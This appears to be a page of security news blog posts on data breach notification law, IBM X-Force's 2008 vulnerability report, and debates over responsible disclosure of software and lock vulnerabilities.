As we await the 60-day federal cybersecurity review from Melissa Hathaway, acting senior director for cyberspace for the National Security and Homeland Security Councils , there is something else that could be done. It seems to me that the federal government could take another related action to help protect the private information of U.S. citizens while reducing the cost of doing so. In my humble opinion, it is time to create a single federal data breach disclosure law. I believe this action would:
Simplify the maze of current state legislation. As of the end of December, 44 states, the District of Columbia, Puerto Rico, and the U.S. Virgin Islands have enacted security breach notification legislation. While most of these laws are modeled on the original California legislation (SB-1386) that took effect in 2003, there are subtle differences in terms of deadlines for notifications, definitions, and civil penalties. Massachusetts and Nevada have gone the furthest so far by mandating that private data be encrypted in certain circumstances. Obviously, this creates a legislative mess that could be streamlined by one central federal regulation.
Protect the unprotected. In the six years since California started the trend toward data breach notification legislation, Alabama, Kentucky, Mississippi, New Mexico, and South Dakota have no such laws in place or have laws that haven't taken effect. I'm not sure why this is but citizens in these states deserve the same type of protection we others have.
Extend the definition of private data into other areas. Aside from state data notification laws, many large organizations must still comply with the Health Insurance Portability and Accountability Act, the Gramm-Leach-Bliley Act, Sarbanes-Oxley Act, etc. There must be a way to broaden the definition of private data and consolidate private data security and breach notification legislation like the European Union has. The cost of compliance could go down precipitously if organizations were not obligated to perform the same basic tasks and audits numerous times.
If we are truly looking for ways to improve electronic data security and reduce cost and overhead, this seems like a good plan to me. I know my argument is simple and I'd be glad to learn more as to whether this logic makes sense. Please let me know if my instincts are correct or whether I've missed some important issues.
More than half of the security vulnerabilities disclosed during 2008 had no patches available from the vendor by the end of the year, according to a report released on Monday by IBM's X-Force research group.
Vendors with the most vulnerabilities disclosed in 2008.
(Credit: IBM X-Force)Meanwhile, 46 percent of vulnerabilities from 2006 and 44 percent from 2007 still had no patch by the end of 2008, the 2008 X-Force Trend and Risk report said. X-Force documented a record number of 7,406 new vulnerabilities last year.
Overall, Microsoft is the vendor that tops the list in percentage of vulnerabilities disclosed, the report said. The Macintosh and base Linux kernel operating systems have dominated the top spots for vulnerabilities by operating system over the past three years, the report said. There were no breakdowns by vendor or operating system for unpatched vulnerabilities.
Most of the spam last year appeared to come from Russia (12 percent), followed by the U.S. (9.6 percent), and Turkey (7.8 percent), although the spam senders could be located in a different location, the report says.
China unseated the U.S. as the country hosting the largest number of malicious Web sites for the first time last year.
Meanwhile, 46 percent of all malware attacks last year were Trojans targeting people playing online games and doing online banking, and 90 percent of phishing attacks targeted financial institutions, according to the report.
Two main trends attackers used last year were SQL injection attacks, in which a small malicious script is inserted into a database that feeds information to the Web site, and malicious URLs hosting exploits.
The operating systems with the most vulnerability disclosures in 2008.
(Credit: IBM X-Force)Updated 2:25 p.m. PST to add that report does not list which vendors and operating system platforms had the most unpatched vulnerabilities.
There has historically been a clash between security researchers who find security flaws in software products and the companies that make those products.
But two recent examples of cooperation between researchers and vendors show hope for future truces.
Leading by example was Dan Kaminsky, director of penetration testing for IOActive, who warned security software vendors about a fatal flaw in the DNS (Domain Name System) months before going public so vendors could release patches.
"What he and others he took into his confidence did over the last few months was not only responsible but extraordinary," my colleague Robert Vamosi wrote in a column about Kaminsky's unprecedented disclosure restraint.
This week, security researchers Robert "RSnake" Hansen and Jeremiah Grossman agreed to withdraw their presentation on a new Web attack they dubbed "Clickjacking" from an upcoming OWASP USA security conference in New York at Adobe Systems' request. Now, Adobe can create a patch for one of its applications before they release proof-of-concept code for the vulnerability, which would allow an attacker to take over the microphone, Webcam, and audio on a computer, according to a report on the Dark Reading site on Tuesday. (Oddly, the vulnerability is actually due to an architectural issue in Internet Explorer, the researchers say.)
"I've always had this philosophy. If you find a mediocre to bad vulnerability, it's better to just talk about it, get it out in the open, and let the world see it," RSnake wrote in a first-person account of the situation on Dark Reading. "However, I've always told myself if I found something like a complete remote desktop compromise or something equally bad, that I'd let the vendors know. The last thing I want to do is spawn a botnet army based on my research. There's a big difference between educating the community about a problem and empowering bad guys."
Most of the researcher-vendor conflict comes down to a matter of timing. Vendors tend to want researchers to keep mum until a fix is ready. And researchers want to go public sooner rather than later so that people relying on those products will know they are at risk. Also, going public can serve to motivate a vendor who might be dragging their feet on acknowledging and fixing the problem.
In 2002, Hewlett-Packard threatened to sue researchers who had publicized a vulnerability in the company's Tru64 Unix operating system. The case was notable in that it was the first time the Digital Millennium Copyright Act had been invoked to stifle research related to computer security.
Previously, the DMCA had been used to prosecute or threaten researchers who had discovered ways to break copyright protections. For instance, Russian programmer Dmitry Sklyarov went to jail in 2001 after Adobe convinced the Justice Department that he had violated the DMCA by breaking e-book protections, but he was later released. And Princeton University professor Edward Felten and his students withdrew a paper on how to break e-music protections after being threatened by the recording industry.
In 2005, Cisco Systems filed a lawsuit against security researcher Michael Lynn just hours after he gave a presentation at Defcon about how attackers could take over Cisco routers. That case was ultimately settled.
These threats and legal actions are unnecessary. Kaminsky, Hansen, and Grossman have shown that there can be compromise. That's a good lesson for three MIT students who pulled a talk at Defcon this summer on hacking the Massachusetts subway system, and for the transit officials who hauled them into court.
LAS VEGAS--Microsoft is jumping into the responsible disclosure game.
The company announced at the Black Hat security conference on Thursday that it is formalizing its program of informing third-party software vendors of security problems with products that run on top of Windows.
"We've seen the threat environment change," said Andrew Cushman, who runs the Microsoft Security Response Center.
Vista is more secure than XP and has fewer infections, he said. In addition, there are an increasing number of third-party exploits, and fewer browser-based exploits than in third-party software, he added.
The MSRC already reports vulnerabilities to other companies, but now it is asking for recognition in finding the vulnerability. Microsoft will not post advisories on any of the third-party security issues it finds, like it does with vulnerabilities found in its own software, Cushman said.
The issue of responsible disclosure is constantly being debated, with vendors often arguing that researchers are too quick to go public when they find a vulnerability and researchers countering that if they didn't go public the vendors would drag their heels on fixing the problem.
"Microsoft is in a unique position to help in that dimension," he said. "We bring a little different gravitas to the table. I think we can actually change the dynamic around responsible disclosure."
Earlier in the week, Microsoft said it would be giving third-party vendors a sneak peek at the technical details of the vulnerabilities in Microsoft software before the company releases its monthly "Patch Tuesday" updates. The company also announced it would help companies prioritize the vulnerabilities in its updates.
In 2004, a video circulated on the Internet showing how a standard Bic pen could be used to open the U-shaped Kryptonite bike lock. The company recalled the locks, replaced newer purchases, and changed the design for new locks. Problem solved, right?
Not exactly. Despite the fact that the problem had been revealed 12 years earlier in a British bike magazine, Kryptonite had continued to sell the locks unchanged. Angry customers filed a class action lawsuit that was settled in 2005, with Kryptonite offering to replace all affected locks or provide vouchers, and compensate people whose bicycles were stolen as a result of the lock being picked.
"If you don't make the problems public, the companies don't fix them and the consumers buy shoddy stuff," said Bruce Schneier, chief security technology officer at BT.
Bruce Schneier is chief security technology officer at BT.
(Credit: Schneier.com)There's been plenty written about breaking into the virtual locks that safeguard sensitive data on the Web. But the picking of real-world physical locks is becoming an increasingly popular pastime for some. Enthusiasts have formed sporting clubs and hold regular competitions. Security researchers write books about how locks can be broken into and show how it's done on blogs and videos and at security conferences.
Naturally, lock manufacturers aren't happy. They argue that publicizing the vulnerabilities causes people to panic unnecessarily and puts the public at risk by giving criminals information they can use to break door locks, safes, and other secured assets.
But, just like third-party disclosure of vulnerabilities in software forces manufacturers to acknowledge security holes and patch them quickly, lock manufacturers will find they can't escape the scrutiny and will have to be held accountable for their products, experts say.
... Read more
- prev
- 1
- next
